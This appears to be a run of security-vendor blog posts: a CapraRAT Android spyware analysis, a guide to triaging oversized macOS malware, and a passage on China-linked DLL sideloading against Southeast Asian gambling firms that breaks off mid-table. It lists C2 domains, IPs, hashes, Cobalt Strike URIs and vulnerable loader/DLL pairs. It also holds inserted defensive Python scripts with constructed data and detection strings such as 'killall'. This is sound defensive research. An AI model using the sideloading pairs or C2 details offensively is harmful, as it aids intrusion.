CapraRAT’s configuration file, which is named interchangeably setting or settings, holds the default configuration information, as well as metadata like versioning. The CapraRAT version syntax seen in YouTube_052647.apk and Piya Sharma.apk – A.F.U.3 and V.U.H.3, respectively – matches the convention used to track Transparent Tribe’s Windows tool, CrimsonRAT. However, there is no tangible relationship between these version numbers and the C2 domains as we saw in CrimsonRAT.

Thanks to creative spelling and naming conventions, the RAT’s configuration provides consistent static detection opportunities, with each of the following present in the samples from earlier in 2023 as well:

  • is_phical
  • isCancl
  • isRealNotif
  • SERVERIP
  • smsMoniter
  • smsWhere
  • verion

MainActivity is responsible for driving the application’s key features. This activity sets persistence through the onCreate method which uses Autostarter, an open-source project with code that lets developers automatically launch an Android application. The TPSClient class is initialized as an object called mTCPService; then, this method calls the serviceRefresh method, which creates an alarm at the interval specified in the settings file’s timeForAlarm variable. In this example, the value 0xea60 is equal to 60,000 milliseconds, meaning the alarm and persistence launcher run once per minute.

The RAT’s core functionality is in an activity similar to the Extra_Class activity from the March 2023 samples reported by ESET. Henceforth, we call this activity TPSClient for simplicity. These files are rather large, decompiling to over 10,000 lines of Smali code. By comparison, the March versions’ equivalents have only about 8,000 lines.

TPSClient contains CapraRAT’s commands, which are invoked through the run method via a series of switch statements that map the string command to a related method.

The smsmons command logic inside the run method of TPSClient

Many of these commands have been documented in previous research, though there are several changes in these new versions. The hideApp method now checks if the system is running Android version 9 or earlier and if the mehiden variable in the setting(s) config file was set to False; if applicable, the app will be hidden from the user’s view. While similarities between CapraRAT and AndroRAT are seemingly minimal at this point in CapraRAT’s development, the AndroRAT source code documentation notes that the tool becomes unstable after Android version 9, so there are likely underlying changes to the OS that make this method behave differently depending on the OS version.

TPSClient has a method check_permissions() that is not in Extra_Class. This method checks the following series of Android permissions and generates a string with a True or False result for each:

  • READ_EXTERNAL_STORAGE
  • READ_CALL_LOG
  • CAMERA
  • READ_CONTACTS
  • ACCESS_FINE_LOCATION
  • RECORD_AUDIO
  • READ_PHONE_STATE

Interestingly, some other older versions contain this method, suggesting that the samples may be tailored for targets or are potentially developed from different branches.

C2 & Infrastructure

In CapraRAT’s configuration file, the SERVERIP variable contains the command-and-control (C2) server address, which can be a domain, IP address, or both. The C2 port is in hexadecimal Big Endian format; the human readable port can be obtained by converting into decimal, resulting in port 14862 for yt.apk, port 18892 for YouTube_052647.apk, and port 10284 for Piya Sharma.apk.
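The configuration keys, the timeForAlarm interval, the hideApp check and the C2 port encoding described in the preceding sections lend themselves to a small static triage script. The following is an added example, not SentinelLabs code: it parses a constructed Smali settings class (the field names come from this report; the values and the SERVERPORT field name are assumptions) and extracts the C2 endpoint, the alarm interval and the misspelled keys that serve as signatures.

```python
"""Static triage of a CapraRAT-style settings class (added example, not SentinelLabs code).

The report describes three things an analyst pulls out of the decompiled
settings/setting class: the misspelled config keys that make good static
signatures, the timeForAlarm persistence interval, and the SERVERIP/port C2
pair. This script parses a constructed Smali snippet and extracts all three.
"""
import re

# Keys the report lists as consistent static detection opportunities.
CAPRARAT_CONFIG_KEYS = {
    "is_phical", "isCancl", "isRealNotif", "SERVERIP", "smsMoniter", "smsWhere", "verion",
}

# Constructed Smali modelled on a decompiled settings class. Field names come
# from the report; the values and the SERVERPORT field name are assumptions.
SAMPLE_SETTINGS_SMALI = """\
.class public Lcom/media/gallery/service/settings;
.super Ljava/lang/Object;

.field public static SERVERIP:Ljava/lang/String; = "c2.example.invalid"
.field public static SERVERPORT:I = 0x3a0e
.field public static timeForAlarm:I = 0xea60
.field public static verion:Ljava/lang/String; = "MSK-2023"
.field public static mehiden:Z = false
.field public static is_phical:Z = false
.field public static isCancl:Z = false
.field public static isRealNotif:Z = true
.field public static smsMoniter:Z = true
.field public static smsWhere:Ljava/lang/String; = "inbox"
"""

# .field <modifiers> <name>:<type descriptor> [= <literal>]
FIELD_RE = re.compile(r"^\.field\s+((?:\w+\s+)*)(\w+):(\S+)(?:\s*=\s*(.+?))?\s*$", re.M)


def parse_static_fields(smali: str) -> dict:
    """Map each field name to (type descriptor, literal value or None)."""
    return {m.group(2): (m.group(3), m.group(4)) for m in FIELD_RE.finditer(smali)}


def decode_int(literal: str) -> int:
    """Smali integer literals are hex (0xea60) or decimal; accept both."""
    text = literal.strip()
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def port_from_bytes(raw: bytes) -> int:
    """The report notes the port is stored big-endian: two bytes, high byte first."""
    return int.from_bytes(raw[:2], "big")


def c2_endpoint(fields: dict, port_field: str = "SERVERPORT"):
    """(host, port) from SERVERIP and the (assumed) port field."""
    host = fields["SERVERIP"][1].strip('"')
    return host, decode_int(fields[port_field][1])


def detection_keys_present(fields: dict) -> set:
    """Which of the known misspelled config keys appear; all seven is a strong signal."""
    return CAPRARAT_CONFIG_KEYS & set(fields)


def alarm_interval_seconds(fields: dict) -> float:
    """timeForAlarm is in milliseconds; 0xea60 is the once-a-minute value in the report."""
    return decode_int(fields["timeForAlarm"][1]) / 1000


def would_hide_app(fields: dict, sdk_int: int) -> bool:
    """hideApp logic as described: Android 9 (API level 28) or earlier and mehiden == false."""
    return sdk_int <= 28 and fields["mehiden"][1] == "false"


if __name__ == "__main__":
    fields = parse_static_fields(SAMPLE_SETTINGS_SMALI)
    print("C2:", c2_endpoint(fields))
    print("alarm every", alarm_interval_seconds(fields), "s")
    print("signature keys:", sorted(detection_keys_present(fields)))
```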

C2 configuration from yt.apk (left) and YouTube_052647.apk (right)

The shareboxs[.]net domain used by YouTube_052647.apk has been associated with Transparent Tribe since at least 2019. Interestingly, the ptzbubble[.]shop domain was registered the same week of ESET’s report outlining the group’s Android apps that leveraged other C2 domains.

The IP addresses associated with C2 from the two YouTube samples have Remote Desktop Protocol port 3389 open with the service identified as Windows Remote Desktop, indicating the group uses Windows Server infrastructure to host the CapraRAT C2 application. The Piya Sharma app’s C2 IP, 209[.]127.19.241, has a certificate with common name value WIN-P9NRMH5G6M8, a longstanding indicator associated with Transparent Tribe’s CrimsonRAT C2 servers.

84[.]46.251.145 – the IP address hosting the ptzbubble[.]shop domain – shows historical resolutions associated with Decoy Dog Pupy RAT DNS tunneling lookups. Any connection between these campaigns is unclear; it is plausible that a service hosted on this IP was infected by that campaign. Based on the query dates, the claudfront[.]net lookup was during the time the CapraRAT actor was using this IP address to host ptzbubble[.]shop, while a lookup to allowlisted[.]net was in December 2022, which was potentially before this actor started using the IP.

Resolution history for IP hosting ptzbubble[.]shop, 84[.]46.251.145

Conclusion

Transparent Tribe is a perennial actor with reliable habits. The relatively low operational security bar enables swift identification of their tools.

The group’s decision to make a YouTube-like app is a new addition to a known trend of the group weaponizing Android applications with spyware and distributing them to targets through social media.

Individuals and organizations connected to diplomatic, military, or activist matters in the India and Pakistan regions should evaluate defense against this actor and threat.

Defensive and preventative measures should include:

  • Do not install Android applications from outside the Google Play Store.
  • Be wary of new social media applications advertised within social media communities.
  • Evaluate the permissions requested by an application, especially one you are not familiar with. Do these permissions expose you to more risk than the potential benefit of the app?
  • Do not install a third-party version of an application already on your device.

CapraRAT malware is fully detected by SentinelOne’s Singularity Mobile solution.

Indicators of Compromise (IOC)

File Hashes – SHA1
14110facecceb016c694f04814b5e504dc6cde61 – Piya Sharma APK
83412f9d757937f2719ebd7e5f509956ab43c3ce – CapraRAT, YouTube_052647.apk
8beab9e454b5283e892aeca6bca9afb608fa8718 – CapraRAT, yt.apk

C2 Network Communications
newsbizshow.net
ptzbubble.shop
shareboxs.net

95[.]111.247.73
209[.]127.19.241

Bloated Binaries | How to Detect and Analyze Large macOS Malware Files

29 August 2023 at 13:48

It wasn’t so long ago that malware authors, much like software developers, were concerned about the size of their code, aiming to keep it as small and compact as possible. Small binaries are less noticeable and can be slipped inside other files or shipped in benign code, attachments and even images. Smaller executables take up less space on disk, are faster to transfer over the wire, and – if they’re written efficiently – can execute their malicious instructions with less tax on the host CPU. In days of small disk drives, slow network connections and underpowered chips, such concerns made good sense and helped malware to avoid detection.

In today’s computer environments, however, storage, bandwidth and processor power are rarely in short supply, and as a result both legitimate programs and malware have increased greatly in size.

While malware executables of several megabytes are now so common they are hardly worthy of mention, some recent malicious programs have taken the invitation to bloat to a new extreme. Malware binaries weighing in at 50MB or more are now widely in use by macOS malware authors, and binaries over 100MB can also be found in some campaigns, typically those involving cryptominers. Such massive file sizes can cause detection problems for some kinds of AV solutions and create triage and reversing challenges for malware analysts.

In this post, we dig into the phenomenon of massive malware binaries on macOS, explaining why they are becoming more common, the problems they cause for detection and analysis, and how defenders can successfully deal with them.

How Widespread are Large macOS Malware Binaries?

It is possible to get a feel for how common large malicious binaries are by hunting in public malware repositories like VirusTotal and filtering by size. For example, if we search for Mach-O binaries over 35MB recognized as malware by 5 or more vendors, the search today returns 524 hits.

Increasing the file size to 50MB or more returns 113 hits, with many of the files returned being samples of Atomic Stealer.

Malicious Mach-O files over 50MB (Source: VirusTotal)

Around 7 samples in the 75MB to 100MB size range are examples of OSX.EvilQuest malware. Adjusting our search to file sizes of 100MB returns over 20 files that five or more vendors detect as malware; many of these are miners, including a coinminer executable weighing in at 345 MB.

A macOS malware executable over 300MB (Source: VirusTotal)

However, the problem is wider than just those files that vendors currently recognize as malware. Both detection solutions and analysts have to determine whether an unknown sample is suspicious or malicious, and if we look at the number of Mach-O binaries on VT in general that are over 35MB, we find almost 100,000 samples, with the number of samples over 100MB currently at almost 50,000.

(Source: VirusTotal)

We can even find a single Mach-O binary on VirusTotal with a file size of 600MB. Are there individual binaries larger than that? Almost certainly, but VirusTotal has a file size upload limit of 650MB, so above that we have a data blindspot for both legitimate and malicious files.

From the data we do have, it is clear large executables are a widespread phenomenon, but why are threat actors turning to bloated binaries and what problems do they cause for enterprise security?

Why Are Threat Actors Turning to Supersized Binaries?

There are a number of reasons why threat actors may choose to distribute malware in oversized binaries. Some large binaries such as cryptominers like BirdMiner (aka LoudMiner) are a result of bundling emulation environments such as QEMU in the malware.

Samples of LoudMiner containing the Linux QEMU emulation environment

Other large binaries are caused by using cross-platform programming languages like Go and Rust. In order to ensure these programs will run on the intended platform, the runtime, libraries and all other dependencies are compiled into the final payload.

In addition, Apple’s switch to ARM from Intel has resurrected the Universal/FAT binary format, in which two architectures are now compiled into a single binary to ensure that the same program will work regardless of whether the user runs it on an Intel Mac or an Apple silicon Mac. Any binary compiled into the Universal format is effectively doubled in size.

As we shall see in the next section, in some cases threat actors may simply bloat files with junk code to defeat file scanners with file size limits or to thwart analysis by malware researchers.

What Problems Do Outsized Binaries Cause For Detection and Analysis?

Massive individual binaries are a relatively recent phenomenon and they cause a headache for traditional AV scanners that rely on either computing a file’s hash or scanning it for malicious content. The larger the binary the longer it takes to scan, and when scanning across numerous files on a file system, the end result can be a sluggish, unresponsive system as the AV software increasingly hogs the host CPU to complete its task.

The performance problems associated with file scanning are historically among the most frequently cited reasons for user complaints, and something the industry has attempted to solve in various ways.

One typical solution employed by many AV scanners is to limit the maximum file size the scanner will accept. In the days when few legitimate programs reached more than 20MB that may have seemed like an acceptable compromise, but given today’s bloated binaries, that’s clearly no longer viable: it would mean that a lot of known malware would go undetected. Threat actors have even been known to bloat files with junk code precisely to defeat file size limits of scanners and malware repositories like VirusTotal, which as we noted above has a max file size upload limit of 650MB.

Massive files are not just a problem for detection software, but also for researchers, reverse engineers and malware analysts. With tens of megabytes of code to analyze, most of which is benign, junk or part of a standard runtime like Go, analysts can have a difficult time identifying exactly which parts of a binary are malicious. This can hamper efforts to find other, possibly undetected, malware samples using the same or similar code and allow threat actors to extend their campaigns without detection.

How to Detect Malware Hidden Inside Massive Binaries

Fortunately, there are solutions to the problem of massive binaries both for detection and analysis. The problems inherent in relying solely on file scanning have been well understood by vendors such as SentinelOne and were part of the paradigm shift that caused such solutions to adopt behavioral detection.

In contrast to a file scanning engine, a behavioral engine examines what a binary does when it is executed rather than examining the file’s content prior to execution. A behavioral approach allows a solution to avoid scanning large amounts of files or files of large sizes and instead determines whether an execution process is involved in malicious activity. Solutions like SentinelOne can thus detect and kill malware regardless of how it is packaged or how large the file is.

Security software that combines multiple detection mechanisms including behavioral and machine learning detection engines is now the standard for enterprise security.


SentinelOne’s Behavioral Engine Detecting Atomic Stealer

How to Analyze Large macOS Malware Binaries

Large binaries present malware analysts with a number of challenges. In this section, we will briefly describe a useful technique for finding interesting code among hundreds of thousands of lines of disassembly leveraging YARA and radare2.

Threat hunters are most familiar with using YARA to determine if a sample file contains strings or bytes similar to other known malware families, but we can also use the same technique to find interesting code typical of malware TTPs. Take the following YARA rule, for example:

This rule returns a match if the binary contains certain strings related to disabling or modifying tools or other processes on a device, a typical anti-analysis and evasion technique. We can create a list of rules with various TTP indicators to help us to statically determine what capabilities a file has that may be related to malware behavior. Here is another example of a rule to indicate a binary that contains code related to system discovery.

We can run our YARA rule set on a given binary from within a radare2 session and, by leveraging YARA’s -m and -s switches, obtain a list of possible TTPs and their offsets for further investigation.

Possible TTPs of Malware sample 1909e84ac796730b119c44c676a730e09fce5ded

In this example we create a radare2 alias to run our YARA TTP ruleset over the file. The alias is equivalent to the command:

yara -ms ttp.yara 

In radare2, the alias can be defined locally within the current r2 session or more usefully as a global alias in the .radare2rc config file as:

(ttp x;  !yara -$0w <path to>/ttp.yara `o.`)

We provide a starter YARA rule set here that other macOS malware analysts can use as a base from which to develop their own more comprehensive ttp.yara file.
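As an added example (not SentinelLabs code and not the starter rule set), the following Python script ties together two points from this post: it enumerates the slices of a Universal binary so the analyst knows which part of a doubled-up file matters, then hunts each slice for TTP indicator strings and emits the absolute offsets as radare2 seek commands, the same workflow as the yara -ms alias above. The TTP patterns and the sample FAT file are constructed for the example.

```python
"""Triage helper for bloated Mach-O binaries (added example, not SentinelLabs code).

Covers two points from this post: a Universal (FAT) binary carries one slice
per architecture, so a large part of a 100MB file may be irrelevant to the
analyst; and TTP-style string hunting with offsets (what yara -m -s gives
you) turns a huge file into a short list of places to seek to in radare2.
Standard library only; the TTP patterns stand in for the post's ttp.yara.
"""
import struct

FAT_MAGIC = 0xCAFEBABE            # fat_header magic, big-endian on disk
MH_MAGIC_64 = 0xFEEDFACF          # 64-bit Mach-O magic, little-endian on disk
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64"}
# Java class files share the 0xCAFEBABE magic; their version field (45 and up)
# would be read as an absurd slice count, so reject anything that large.
MAX_FAT_ARCHES = 32

# Constructed TTP patterns in the spirit of the post's ttp.yara strings.
TTP_RULES = {
    "anti_analysis_kill_tools": [b"killall", b"pkill -9"],
    "system_discovery": [b"system_profiler", b"sw_vers", b"ioreg"],
}


def fat_slices(data: bytes) -> list:
    """Return [(arch, offset, size)] for a FAT binary, or [] if the file is thin."""
    if len(data) < 8 or struct.unpack(">I", data[:4])[0] != FAT_MAGIC:
        return []
    nfat = struct.unpack(">I", data[4:8])[0]
    if nfat == 0 or nfat > MAX_FAT_ARCHES:
        return []
    slices = []
    for i in range(nfat):
        # struct fat_arch: cputype, cpusubtype, offset, size, align (all big-endian)
        start = 8 + 20 * i
        if len(data) < start + 20:
            raise ValueError("truncated fat header")
        cputype, _sub, off, size, _align = struct.unpack(">IIIII", data[start:start + 20])
        if off + size > len(data):
            raise ValueError(f"slice {i} ({off:#x}+{size}) runs past end of file")
        slices.append((CPU_NAMES.get(cputype, hex(cputype)), off, size))
    return slices


def find_ttps(data: bytes, base: int = 0) -> dict:
    """{rule: [(pattern, absolute offset), ...]} for every pattern occurrence."""
    hits = {}
    for rule, patterns in TTP_RULES.items():
        for pat in patterns:
            pos = data.find(pat)
            while pos != -1:
                hits.setdefault(rule, []).append((pat.decode(), base + pos))
                pos = data.find(pat, pos + 1)
    return hits


def triage(data: bytes):
    """Per-slice TTP hits; a thin binary is treated as a single slice at offset 0."""
    slices = fat_slices(data) or [("thin", 0, len(data))]
    report = {arch: find_ttps(data[off:off + size], base=off) for arch, off, size in slices}
    return slices, report


def r2_seek_commands(report: dict) -> list:
    """Hits as radare2 seek commands, one per offset, ready to paste into an r2 session."""
    return [f"s {off:#x}  # {arch} {rule}: {pat}"
            for arch, hits in report.items()
            for rule, matches in hits.items()
            for pat, off in matches]


def build_sample_fat() -> bytes:
    """Constructed two-slice Universal binary: real header layout, fake slice bodies."""
    x86 = struct.pack("<I", MH_MAGIC_64) + b"\x00" * 60 + b"/usr/sbin/system_profiler\x00" + b"\x00" * 32
    arm = (struct.pack("<I", MH_MAGIC_64) + b"\x00" * 60
           + b"killall Activity Monitor\x00" + b"sw_vers -productVersion\x00")
    off_x86 = 0x1000                                   # slices are page aligned (align = 2^12)
    off_arm = off_x86 + ((len(x86) + 0xFFF) & ~0xFFF)
    hdr = struct.pack(">II", FAT_MAGIC, 2)
    hdr += struct.pack(">IIIII", CPU_TYPE_X86_64, 3, off_x86, len(x86), 12)
    hdr += struct.pack(">IIIII", CPU_TYPE_ARM64, 0, off_arm, len(arm), 12)
    blob = bytearray(off_arm + len(arm))
    blob[:len(hdr)] = hdr
    blob[off_x86:off_x86 + len(x86)] = x86
    blob[off_arm:off_arm + len(arm)] = arm
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample_fat()
    slices, report = triage(sample)
    for arch, off, size in slices:
        print(f"{arch:8} offset={off:#x} size={size}")
    print("\n".join(r2_seek_commands(report)))
```

Against a real sample, read the file into bytes and pass it to triage(); the offsets it prints are absolute file offsets, so they can be used directly with s in an r2 session opened on the whole Universal file.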

The SentinelLabs starter rule set for statically detecting macOS malware TTPs

Conclusion

Massive binaries are becoming increasingly common on the macOS platform and defenders need strategies for dealing with them. Malware authors have embraced the idea of distributing huge binaries in part as a tactic for defense evasion and anti-analysis and in part as a result of turning to cross-platform languages that pack a runtime, library and other dependencies in the final payload.

Organizations can detect large malicious binaries by turning to solutions that include behavioral detection and do not rely solely on file scanning. Analysts can implement techniques such as those discussed above to help them triage massive macOS malware samples faster and more efficiently.

YARA Rule set

https://github.com/SentineLabs/macos-ttps-yara

Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector

17 August 2023 at 09:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs has identified suspected-Chinese malware and infrastructure potentially involved in China-associated operations directed at the gambling sector within Southeast Asia.
  • The threat actors drop Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons.
  • We’ve observed related malware using the signature of a likely stolen code signing certificate issued to PMG PTE LTD, a Singapore-based vendor of Ivacy VPN services.
  • Indicators point to the China-aligned BRONZE STARLIGHT group; however, the exact grouping remains unclear due to the interconnected relationships among various Chinese APT groups.

Overview

Thriving after China’s crackdown on its Macao-based gambling industry, the Southeast Asian gambling sector has become a focal point for the country’s interests in the region, particularly data collection for monitoring and countering related activities in China.

We observed malware and infrastructure likely related to China-aligned activities targeting this sector. The malware and infrastructure we analyze are related to indicators observed in Operation ChattyGoblin and are likely part of the same activity cluster. Operation ChattyGoblin is ESET’s name for a series of attacks by China-nexus actors targeting Southeast Asian gambling companies with trojanized Comm100 and LiveHelp100 chat applications.

The targeting, used malware, and C2 infrastructure specifics point to past activities that third parties have linked to the China-aligned BRONZE STARLIGHT group (also known as DEV-0401 or SLIME34). This is a suspected Chinese ‘ransomware’ group whose main goal appears to be espionage rather than financial gain, using ransomware as means for distraction or misattribution. Team T5 has also reported on BRONZE STARLIGHT’s politically-motivated involvement in targeting the Southeast Asian gambling industry.

Despite the indicators observed, accurate clustering remains challenging. The Chinese APT ecosystem is plagued by extensive sharing of malware and infrastructure management processes between groups, making high confidence clustering difficult based on current visibility. Our analysis has led us to historical artifacts that represent points of convergence between BRONZE STARLIGHT and other China-based actors, which showcases the complexity of a Chinese threat ecosystem composed of closely affiliated groups.

Background

ESET reported that a ChattyGoblin-related attack in March 2023 targeted the support agents of a gambling company in the Philippines. In the attack, a trojanized LiveHelp100 application downloaded a .NET malware loader named agentupdate_plugins.exe. The final payload was a Cobalt Strike beacon using the duckducklive[.]top domain for C2 purposes. The hash of this malware loader was not disclosed.

We subsequently identified malware loaders that we assess are closely related to those observed as part of Operation ChattyGoblin and are likely part of the same activity cluster – a .NET executable also named agentupdate_plugins.exe and its variant AdventureQuest.exe.

This association is based on naming conventions, code, and functional overlaps with the sample described in ESET’s report. Although we cannot conclusively determine whether the agentupdate_plugins.exe we analyzed is the same as that reported by ESET, we note that one of its VirusTotal submissions is dated March 2023 and originates from the Philippines. This aligns with the geolocation of the target and the timeline of the ChattyGoblin-related attack involving agentupdate_plugins.exe.

The Malware Loaders

agentupdate_plugins.exe and AdventureQuest.exe deploy .NET executables based on the SharpUnhooker tool, which download second-stage data from Alibaba buckets hosted at agenfile.oss-ap-southeast-1.aliyuncs[.]com and codewavehub.oss-ap-southeast-1.aliyuncs[.]com. The second-stage data is stored in password-protected zip archives.

The zip archives downloaded by agentupdate_plugins.exe and AdventureQuest.exe contain sideloading capabilities. Each of the archives we were able to retrieve consists of a legitimate executable vulnerable to DLL search order hijacking, a malicious DLL that gets sideloaded by the executable when started, and an encrypted data file named agent.data.

The executables are components of the software products Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan. The malicious DLLs masquerade as their legitimate counterparts: they export functions with the same names, such that specific functions, when invoked by the legitimate executables, decrypt and execute code embedded in the data files. The data files we could retrieve implement Cobalt Strike beacons.

adobe_helper.zip (agentupdate_plugins.exe)
  Archive content: Adobe CEF Helper.exe, libcef.dll, agent.data (not available)
  Final payload: not recovered

cefhelper.zip (AdventureQuest.exe)
  Archive content: identity_helper.exe, msedge_elf.dll, agent.data
  Final payload: Cobalt Strike, C2: www.100helpchat[.]com

Agent_bak.zip (AdventureQuest.exe)
  Archive content: mfeann.exe, LockDown.dll, agent.data
  Final payload: Cobalt Strike, C2: live100heip[.]com

The 100helpchat[.]com and live100heip[.]com C2 domains follow the naming convention of the LiveHelp100 trojanized application used in operation ChattyGoblin, possibly to make malicious network activity look like legitimate LiveHelp100 activity.
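A defender-side view of the loader/DLL pairs in the archive table, as an added example rather than SentinelLabs code: it checks ImageLoad-style events (constructed here using Sysmon Event ID 7 field names) for the three vendor executables loading their sideloaded DLL from outside the vendor's install directory or without a signature. The expected directories are an example allowlist, not a vendor-maintained one.

```python
"""Hunting the DLL sideloading pairs from the archive table (added example, not SentinelLabs code).

Each pair is a legitimate, signed vendor executable that resolves a DLL by name
and so loads whatever sits beside it. The records below are constructed in the
shape of Sysmon Event ID 7 (ImageLoad) fields; the expected install directories
are an example allowlist.
"""
import ntpath

# Loader executable -> DLL it sideloads, from the report's archive table.
SIDELOAD_PAIRS = {
    "adobe cef helper.exe": "libcef.dll",
    "identity_helper.exe": "msedge_elf.dll",
    "mfeann.exe": "lockdown.dll",
}

# Where each loader normally lives (constructed allowlist, lowercase prefixes).
EXPECTED_DIRS = {
    "adobe cef helper.exe": r"c:\program files\adobe",
    "identity_helper.exe": r"c:\program files (x86)\microsoft\edge",
    "mfeann.exe": r"c:\program files\mcafee",
}

# Constructed ImageLoad events: one benign Edge load, two staged copies, one unrelated load.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_elf.dll",
     "Signed": "true", "Signature": "Microsoft Corporation"},
    {"Image": r"C:\Users\agent\AppData\Local\Temp\cefhelper\identity_helper.exe",
     "ImageLoaded": r"C:\Users\agent\AppData\Local\Temp\cefhelper\msedge_elf.dll",
     "Signed": "false", "Signature": ""},
    {"Image": r"C:\Users\agent\Downloads\Agent_bak\mfeann.exe",
     "ImageLoaded": r"C:\Users\agent\Downloads\Agent_bak\LockDown.dll",
     "Signed": "false", "Signature": ""},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
]


def assess(event: dict) -> list:
    """Reasons this ImageLoad looks like one of the report's sideloads; empty if it does not."""
    exe = ntpath.basename(event["Image"]).lower()
    dll = ntpath.basename(event["ImageLoaded"]).lower()
    if SIDELOAD_PAIRS.get(exe) != dll:
        return []                           # not a loader/DLL pair from the report
    reasons = []
    exe_dir = ntpath.dirname(event["Image"]).lower()
    if not exe_dir.startswith(EXPECTED_DIRS[exe]):
        reasons.append(f"{exe} running from unexpected directory {exe_dir}")
    if event.get("Signed", "").lower() != "true":
        reasons.append(f"{dll} loaded by {exe} is unsigned")
    return reasons


def hunt(events: list) -> list:
    """(Image, reasons) for every event that trips at least one check."""
    findings = []
    for event in events:
        reasons = assess(event)
        if reasons:
            findings.append((event["Image"], reasons))
    return findings


if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("  -", reason)
```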

agentupdate_plugins.exe and AdventureQuest.exe implement geofencing based on the ifconfig.co IP-based geolocation service. The loaders are meant to stop their execution if they are run on a machine located in the United States, Germany, France, Russia, India, Canada, or the United Kingdom. This may indicate that the threat actors have no interest in intrusions in these countries for this campaign. Due to errors in implementation, the geofencing fails to work as intended.

Stolen Ivacy VPN Certificate

AdventureQuest.exe is signed using a certificate issued to the Ivacy VPN vendor PMG PTE LTD:

  • Thumbprint: 62E990CC0A26D58E1A150617357010EE53186707
  • Serial number: 0E3E037C57A5447295669A3DB1A28B8A

Ivacy has been present on the market since 2007 and attracts users with low-price offerings.

It is likely that at some point the PMG PTE LTD signing key was stolen – a familiar technique of known Chinese threat actors to enable malware signing. VPN providers are critical targets, since they enable threat actors to potentially gain access to sensitive user data and communications.

At the time of writing, we have not observed any public statements by PMG PTE LTD clarifying the circumstances that have led to the use of their signing keys for signing malware. The DigiCert Certificate Authority has revoked the compromised certificate after a public discussion on the issue.

HUI Loader

The malicious DLLs libcef.dll, msedge_elf.dll, and LockDown.dll distributed by agentupdate_plugins.exe and AdventureQuest.exe are HUI Loader variants. HUI Loader is a custom malware loader shared between several China-nexus groups. The loader is executed through sideloading by legitimate executables vulnerable to DLL hijacking and stages a payload stored in an encrypted file. HUI Loader variants may differ in implemented payload staging and execution techniques as well as additional functionalities, such as establishing persistence and disabling security features.

libcef.dll, msedge_elf.dll, and LockDown.dll closely resemble HUI Loader variants observed in a string of cyberespionage and ransomware operations that third parties have linked to APT10, TA410, and BRONZE STARLIGHT.

  • BRONZE STARLIGHT (aliases: DEV-0401, SLIME34): A China-based ransomware operator active since 2021. The group is known for deploying a variety of ransomware families, such as LockFile, AtomSilo, NightSky, LockBit 2.0, and Pandora, and shares tooling with APT10. BRONZE STARLIGHT’s main goal is suspected to be espionage rather than financial gain, using ransomware as a means for distraction or misattribution.
  • APT10 (aliases: BRONZE RIVERSIDE, MenuPass): A China-nexus cyberespionage group active since at least 2009. The group focuses on targeting entities considered strategically important by the Chinese state.
  • TA410: A China-nexus cyberespionage group loosely linked to APT10 but tracked as a distinct entity. The group is mostly known for targeting the US utilities sector and Middle Eastern governments.

APT10 and TA410 Operations

The cef_string_map_key function of libcef.dll downloaded by agentupdate_plugins.exe references the C:\Users\hellokety.ini file.

The cef_string_map_key function

HUI Loader variants with this exact artifact have been reported as part of several cyberespionage operations:

  • enSilo (now Fortinet) has disclosed cyberespionage activities in Southeast Asia observed in April 2019 and attributed them with medium confidence to APT10.
  • Researchers from Macnica, Secureworks, and Kaspersky have presented on A41APT campaign activity conducted throughout 2021. A41APT is a long-running cyberespionage campaign targeting Japanese companies and their overseas branches. Kaspersky has attributed earlier A41APT activity (from March 2019 to the end of December 2020) with high confidence to APT10. TrendMicro has attributed A41APT activity over 2020 and 2021 to a group they track as Earth Tengshe, noting that Earth Tengshe is related to APT10 with some differences in employed TTPs.
  • ESET has presented on TA410 activities, noting the hellokety.ini artifact in this context. ESET also notes the possibility that the April 2019 activities reported by Fortinet were misattributed to APT10 instead of TA410.
HUI Loader variants (hellokety.ini) used in APT10 and TA410 operations

BRONZE STARLIGHT Operations

Since around 2021, HUI Loader variants have been deployed in operations involving the ransomware families LockFile (Symantec, 2021; NSFOCUS, 2021), AtomSilo (Sophos, 2021), NightSky (Microsoft, 2021), LockBit 2.0 (SentinelLabs, 2022), and Pandora (TrendMicro, 2022). Some of these operations have been attributed to BRONZE STARLIGHT by the organizations disclosing them and all of them collectively by Secureworks. All of these ransomware families have been noted by Microsoft as being part of the BRONZE STARLIGHT arsenal in time intervals aligning with those of the previously mentioned operations.

C2 Infrastructure

The Cobalt Strike C2 GET and POST URIs associated with the Operation ChattyGoblin domain duckducklive[.]top contain /functionalStatus and /rest/2/meetings, respectively. Their uncommon full forms closely resemble those observed by Secureworks in AtomSilo, Night Sky, and Pandora operations they attribute to BRONZE STARLIGHT. The researchers reported that, as of June 2022, they had not seen this Cobalt Strike configuration associated with other ransomware families. The threat actors have likely adapted a public Cobalt Strike malleable C2 profile available in a Github repository of the user xx0hcd.

Cobalt Strike C2 POST URI                               Relation
/rest/2/meetingsmCRW64qPFqLKw7X56lR41fx                 Operation ChattyGoblin
/rest/2/meetingsVDcrCtBuGm8dime2C5zQ3EHbRE156AkpMu6W    AtomSilo
/rest/2/meetingsQpmhJveuV1ljApIzpTAL                    Night Sky
/rest/2/meetingsKdEs85OkdgIPwcqbjS7uzVZKBIZNHeO4r5sKe   Pandora

The C2 GET and POST URIs associated with the www.100helpchat[.]com and live100heip[.]com domains we observed contain /owa followed by character strings. The format of these strings resembles those in the URIs associated with duckducklive[.]top and also those reported in past BRONZE STARLIGHT activities. It is likely that the threat actors have adapted another open source Cobalt Strike malleable C2 profile, which is also available in a Github repository of the user xx0hcd.

Domain                  Cobalt Strike C2 URIs
live100heip[.]com       GET:  /owa/Z7bziD-BDtV9U1aLS9AhW4jyN1NEOelTEi
